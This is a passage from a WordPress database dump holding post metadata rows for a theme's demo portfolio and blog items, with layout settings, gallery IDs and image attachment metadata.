Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54093,3098,'mkdf_portfolio_single_template_meta','gallery'),(54094,3098,'_thumbnail_id','1056'),(54095,3098,'_dp_original','580'),(54096,3098,'_wp_old_slug','h2-1'),(54097,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54098,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54099,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54100,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54101,3099,'_thumbnail_id','2204'),(54102,3099,'mkdf_page_content_behind_header_meta','no'),(54103,3099,'mkdf_page_content_padding','115px 0 100px 0'),(54104,3099,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54105,3099,'portfolio_single_back_to_link','1008'),(54106,3099,'mkdf_disable_vertical_header_background_image_meta','no'),(54107,3099,'mkdf_disable_header_widget_areas_meta','no'),(54108,3099,'slide_template','default'),(54109,3099,'_wpb_vc_js_status','true'),(54110,3099,'mkdf-portfolio-image-gallery','567,566,565'),(54111,3099,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54112,3099,'mkdf_portfolio_single_template_meta','small-images'),(54113,3099,'_wp_old_slug','h1-2-2'),(54114,3099,'_wp_old_slug','h2-1'),(54115,3099,'_dp_original','933'),(54116,3099,'_wp_old_slug','h7-4'),(54117,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54118,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54119,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54120,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54121,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54122,3100,'mkdf_page_content_behind_header_meta','no'),(54123,3100,'mkdf_page_content_padding','115px 0 100px 0'),(54124,3100,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54125,3100,'portfolio_single_back_to_link','1008'),(54126,3100,'mkdf_disable_vertical_header_background_image_meta','no'),(54127,3100,'mkdf_disable_header_widget_areas_meta','no'),(54128,3100,'slide_template','default'),(54129,3100,'_wpb_vc_js_status','true'),(54130,3100,'mkdf-portfolio-image-gallery','567,566,565'),(54131,3100,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54132,3100,'mkdf_portfolio_single_template_meta','gallery'),(54133,3100,'_thumbnail_id','2202'),(54134,3100,'_dp_original','936'),(54135,3100,'_wp_old_slug','h7-1'),(54136,3100,'_wp_old_slug','vegetable-cream-soup__trashed'),(54137,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54138,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54139,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54140,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54141,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54142,3101,'mkdf_page_content_behind_header_meta','no'),(54143,3101,'mkdf_page_content_padding','115px 0 100px 0'),(54144,3101,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54145,3101,'portfolio_single_back_to_link','1008'),(54146,3101,'mkdf_disable_vertical_header_background_image_meta','no'),(54147,3101,'mkdf_disable_header_widget_areas_meta','no'),(54148,3101,'slide_template','default'),(54149,3101,'_wpb_vc_js_status','true'),(54150,3101,'mkdf-portfolio-image-gallery','567,566,565'),(54151,3101,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54152,3101,'mkdf_portfolio_single_template_meta','slider'),(54153,3101,'_thumbnail_id','1030'),(54154,3101,'_dp_original','1021'),(54155,3101,'_wp_old_slug','h7-5'),(54156,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54157,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54158,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54159,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54160,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54161,3102,'_thumbnail_id','2349'),(54162,3102,'mkdf_page_content_behind_header_meta','no'),(54163,3102,'mkdf_page_content_padding','115px 0 100px 0'),(54164,3102,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54165,3102,'portfolio_single_back_to_link','1008'),(54166,3102,'mkdf_disable_vertical_header_background_image_meta','no'),(54167,3102,'mkdf_disable_header_widget_areas_meta','no'),(54168,3102,'slide_template','default'),(54169,3102,'_wpb_vc_js_status','true'),(54170,3102,'mkdf-portfolio-image-gallery','567,566,565'),(54171,3102,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54172,3102,'mkdf_portfolio_single_template_meta','small-images'),(54173,3102,'_wp_old_slug','h1-2-2'),(54174,3102,'_wp_old_slug','h2-1'),(54175,3102,'_dp_original','1019'),(54176,3102,'_wp_old_slug','h7-6'),(54177,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54178,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54179,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54180,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54181,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54182,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54183,2344,'_thumbnail_id','2351'),(54184,2344,'mkdf_page_content_behind_header_meta','no'),(54185,2344,'mkdf_page_content_padding','115px 0 100px 0'),(54186,2344,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54187,2344,'portfolio_single_back_to_link','1008'),(54188,2344,'mkdf_disable_vertical_header_background_image_meta','no'),(54189,2344,'mkdf_disable_header_widget_areas_meta','no'),(54190,2344,'slide_template','default'),(54191,2344,'_wpb_vc_js_status','true'),(54192,2344,'mkdf-portfolio-image-gallery','567,566,565'),(54193,2344,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54194,2344,'mkdf_portfolio_single_template_meta','small-images'),(54195,2344,'_wp_old_slug','h1-2-2'),(54196,2344,'_wp_old_slug','h2-1'),(54197,2344,'_wp_old_slug','h7-6'),(54198,2344,'_dp_original','1048'),(54199,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54200,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54201,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54202,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54203,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54204,2345,'_thumbnail_id','2353'),(54205,2345,'mkdf_page_content_behind_header_meta','no'),(54206,2345,'mkdf_page_content_padding','115px 0 100px 0'),(54207,2345,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54208,2345,'portfolio_single_back_to_link','1008'),(54209,2345,'mkdf_disable_vertical_header_background_image_meta','no'),(54210,2345,'mkdf_disable_header_widget_areas_meta','no'),(54211,2345,'slide_template','default'),(54212,2345,'_wpb_vc_js_status','true'),(54213,2345,'mkdf-portfolio-image-gallery','565,566,567'),(54214,2345,'mkdf_portfolio_single_template_meta','small-slider'),(54215,2345,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54216,2345,'_wp_old_slug','h7-2'),(54217,2345,'_dp_original','1020'),(54218,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54219,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54220,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54221,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54222,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54223,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54224,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54225,2898,'mkdf_page_content_behind_header_meta','no'),(54226,2898,'mkdf_page_content_padding','115px 0 100px 0'),(54227,2898,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54228,2898,'portfolio_single_back_to_link','569'),(54229,2898,'mkdf_disable_vertical_header_background_image_meta','no'),(54230,2898,'mkdf_disable_header_widget_areas_meta','no'),(54231,2898,'slide_template','default'),(54232,2898,'_wpb_vc_js_status','true'),(54233,2898,'mkdf-portfolio-image-gallery','567,566,565'),(54234,2898,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54235,2898,'mkdf_portfolio_single_template_meta','small-slider'),(54236,2898,'_thumbnail_id','594'),(54237,2898,'_wp_old_slug','h8-6'),(54238,2898,'_dp_original','592'),(54239,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54240,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54241,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54242,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54243,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54244,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54245,2899,'_thumbnail_id','591'),(54246,2899,'mkdf_page_content_behind_header_meta','no'),(54247,2899,'mkdf_page_content_padding','115px 0 100px 0'),(54248,2899,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54249,2899,'portfolio_single_back_to_link','569'),(54250,2899,'mkdf_disable_vertical_header_background_image_meta','no'),(54251,2899,'mkdf_disable_header_widget_areas_meta','no'),(54252,2899,'slide_template','default'),(54253,2899,'_wpb_vc_js_status','true'),(54254,2899,'mkdf-portfolio-image-gallery','567,566,565'),(54255,2899,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54256,2899,'mkdf_portfolio_single_template_meta','slider'),(54257,2899,'_wp_old_slug','h8-5'),(54258,2899,'_dp_original','590'),(54259,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54260,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54261,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54262,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54263,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54264,2900,'_thumbnail_id','589'),(54265,2900,'mkdf_page_content_behind_header_meta','no'),(54266,2900,'mkdf_page_content_padding','115px 0 100px 0'),(54267,2900,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54268,2900,'portfolio_single_back_to_link','569'),(54269,2900,'mkdf_disable_vertical_header_background_image_meta','no'),(54270,2900,'mkdf_disable_header_widget_areas_meta','no'),(54271,2900,'slide_template','default'),(54272,2900,'_wpb_vc_js_status','true'),(54273,2900,'mkdf-portfolio-image-gallery','567,566,565'),(54274,2900,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54275,2900,'mkdf_portfolio_single_template_meta','masonry'),(54276,2900,'_wp_old_slug','h8-4'),(54277,2900,'_dp_original','588'),(54278,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54279,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54280,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54281,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54282,2901,'_thumbnail_id','584'),(54283,2901,'mkdf_page_content_behind_header_meta','no'),(54284,2901,'mkdf_page_content_padding','115px 0 100px 0'),(54285,2901,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54286,2901,'portfolio_single_back_to_link','569'),(54287,2901,'mkdf_disable_vertical_header_background_image_meta','no'),(54288,2901,'mkdf_disable_header_widget_areas_meta','no'),(54289,2901,'slide_template','default'),(54290,2901,'_wpb_vc_js_status','true'),(54291,2901,'mkdf-portfolio-image-gallery','567,566,565'),(54292,2901,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54293,2901,'mkdf_portfolio_single_template_meta','small-images'),(54294,2901,'_wp_old_slug','h8-3'),(54295,2901,'_dp_original','583'),(54296,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54297,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54298,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54299,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54300,2902,'mkdf_page_content_behind_header_meta','no'),(54301,2902,'mkdf_page_content_padding','115px 0 100px 0'),(54302,2902,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54303,2902,'portfolio_single_back_to_link','569'),(54304,2902,'mkdf_disable_vertical_header_background_image_meta','no'),(54305,2902,'mkdf_disable_header_widget_areas_meta','no'),(54306,2902,'slide_template','default'),(54307,2902,'_wpb_vc_js_status','true'),(54308,2902,'mkdf-portfolio-image-gallery','567,566,565'),(54309,2902,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54310,2902,'mkdf_portfolio_single_template_meta','gallery'),(54311,2902,'_thumbnail_id','587'),(54312,2902,'_wp_old_slug','h8-2'),(54313,2902,'_dp_original','580'),(54314,2903,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54315,2903,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54316,2903,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54317,2903,'_thumbnail_id','571'),(54318,2903,'mkdf_page_content_behind_header_meta','no'),(54319,2903,'mkdf_page_content_padding','115px 0 100px 0'),(54320,2903,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54321,2903,'portfolio_single_back_to_link','569'),(54322,2903,'mkdf_disable_vertical_header_background_image_meta','no'),(54323,2903,'mkdf_disable_header_widget_areas_meta','no'),(54324,2903,'slide_template','default'),(54325,2903,'_wpb_vc_js_status','true'),(54326,2903,'mkdf-portfolio-image-gallery','565,566,567'),(54327,2903,'mkdf_portfolio_single_template_meta','small-slider'),(54328,2903,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54329,2903,'_wp_old_slug','h8-1'),(54330,2903,'_dp_original','568'),(54331,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54332,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54333,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54334,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54335,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54336,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54337,2930,'_thumbnail_id','2353'),(54338,2930,'mkdf_page_content_behind_header_meta','no'),(54339,2930,'mkdf_page_content_padding','115px 0 100px 0'),(54340,2930,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54341,2930,'portfolio_single_back_to_link','1008'),(54342,2930,'mkdf_disable_vertical_header_background_image_meta','no'),(54343,2930,'mkdf_disable_header_widget_areas_meta','no'),(54344,2930,'slide_template','default'),(54345,2930,'_wpb_vc_js_status','true'),(54346,2930,'mkdf-portfolio-image-gallery','565,566,567'),(54347,2930,'mkdf_portfolio_single_template_meta','small-slider'),(54348,2930,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54349,2930,'_wp_old_slug','h7-2'),(54350,2930,'_dp_original','2345'),(54351,1,'_mkdf-like','0'),(54393,1446,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54394,1446,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54395,1446,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54396,1446,'slide_template','default'),(54397,1446,'mkdf_page_content_behind_header_meta','no'),(54398,1446,'mkdf_video_type_meta','social_networks'),(54399,1446,'mkdf_audio_type_meta','social_networks'),(54400,1446,'mkdf_disable_vertical_header_background_image_meta','no'),(54401,1446,'mkdf_disable_header_widget_areas_meta','no'),(54402,1446,'mkdf_show_title_area_meta','yes'),(54403,1446,'mkdf_title_area_type_meta','attika'),(54404,1446,'_mkdf-like','0'),(54405,1446,'_thumbnail_id','1447'),(54406,1446,'_wpb_vc_js_status','true'),(54407,1446,'mkdf_page_content_padding','120px 0 0'),(54408,1446,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54409,1446,'_dp_original','6'),(54410,1454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54411,1454,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54412,1454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54413,1454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54414,1454,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54415,1454,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54416,1454,'slide_template','default'),(54417,1454,'mkdf_page_content_behind_header_meta','no'),(54418,1454,'mkdf_video_type_meta','social_networks'),(54419,1454,'mkdf_audio_type_meta','social_networks'),(54420,1454,'mkdf_disable_vertical_header_background_image_meta','no'),(54421,1454,'mkdf_disable_header_widget_areas_meta','no'),(54422,1454,'mkdf_show_title_area_meta','yes'),(54423,1454,'mkdf_title_area_type_meta','attika'),(54424,1454,'_mkdf-like','0'),(54425,1454,'_thumbnail_id','1449'),(54426,1454,'_wpb_vc_js_status','true'),(54427,1454,'mkdf_page_content_padding','120px 0 0'),(54428,1454,'_dp_original','1446'),(54429,1454,'_wp_old_slug','strong-recepies-big-chefs-recomendations'),(54430,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54431,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54432,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54433,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54434,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54435,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54436,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54437,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54438,1459,'slide_template','default'),(54439,1459,'mkdf_page_content_behind_header_meta','no'),(54440,1459,'mkdf_video_type_meta','social_networks'),(54441,1459,'mkdf_audio_type_meta','social_networks'),(54442,1459,'mkdf_disable_vertical_header_background_image_meta','no'),(54443,1459,'mkdf_disable_header_widget_areas_meta','no'),(54444,1459,'mkdf_show_title_area_meta','yes'),(54445,1459,'mkdf_title_area_type_meta','attika'),(54446,1459,'_mkdf-like','0'),(54447,1459,'_thumbnail_id','1450'),(54448,1459,'_wpb_vc_js_status','true'),(54449,1459,'mkdf_page_content_padding','120px 0 0'),(54450,1459,'_dp_original','1454'),(54451,1459,'_wp_old_slug','new-places-of-attica'),(54452,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54453,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54454,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54455,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54456,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54457,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54458,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54459,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54460,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54461,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(54462,1462,'slide_template','default'),(54463,1462,'mkdf_page_content_behind_header_meta','no'),(54464,1462,'mkdf_video_type_meta','social_networks'),(54465,1462,'mkdf_audio_type_meta','social_networks'),(54466,1462,'mkdf_disable_vertical_header_background_image_meta','no'),(54467,1462,'mkdf_disable_header_widget_areas_meta','no'),(54468,1462,'mkdf_show_title_area_meta','yes'),(54469,1462,'mkdf_title_area_type_meta','attika'),(54470,1462,'_mkdf-like','0'),(54471,1462,'_thumbnail_id','1451'),(54472,1462,'_wpb_vc_js_status','true'),(54473,1462,'mkdf_page_content_padding','120px 0 0'),(54474,1462,'_dp_original','1459'),(54475,1462,'_wp_old_slug','big-chefs-recomendations-strong-recepies'),(58436,4598,'_edit_lock','1611649742:71'),(58435,4596,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:27:\"woocommerce-placeholder.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"woocommerce-placeholder-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-650x650.png\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:36:\"woocommerce-placeholder-1200x650.png\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:36:\"woocommerce-placeholder-650x1200.png\";s:5:\"width\";i:650;s:6:\"height\";i:1200;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(58434,4596,'_wp_attached_file','woocommerce-placeholder.png'),(54498,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54499,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54500,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54501,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54502,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54503,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54504,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54505,2931,'_thumbnail_id','2351'),(54506,2931,'mkdf_page_content_behind_header_meta','no'),(54507,2931,'mkdf_page_content_padding','115px 0 100px 0'),(54508,2931,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54509,2931,'portfolio_single_back_to_link','1008'),(54510,2931,'mkdf_disable_vertical_header_background_image_meta','no'),(54511,2931,'mkdf_disable_header_widget_areas_meta','no'),(54512,2931,'slide_template','default'),(54513,2931,'_wpb_vc_js_status','true'),(54514,2931,'mkdf-portfolio-image-gallery','567,566,565'),(54515,2931,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54516,2931,'mkdf_portfolio_single_template_meta','small-images'),(54517,2931,'_wp_old_slug','h1-2-2'),(54518,2931,'_wp_old_slug','h2-1'),(54519,2931,'_wp_old_slug','h7-6'),(54520,2931,'_dp_original','2344'),(54521,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54522,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54523,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54524,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54525,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54526,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54527,2932,'_thumbnail_id','2349'),(54528,2932,'mkdf_page_content_behind_header_meta','no'),(54529,2932,'mkdf_page_content_padding','115px 0 100px 0'),(54530,2932,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54531,2932,'portfolio_single_back_to_link','1008'),(54532,2932,'mkdf_disable_vertical_header_background_image_meta','no'),(54533,2932,'mkdf_disable_header_widget_areas_meta','no'),(54534,2932,'slide_template','default'),(54535,2932,'_wpb_vc_js_status','true'),(54536,2932,'mkdf-portfolio-image-gallery','567,566,565'),(54537,2932,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John 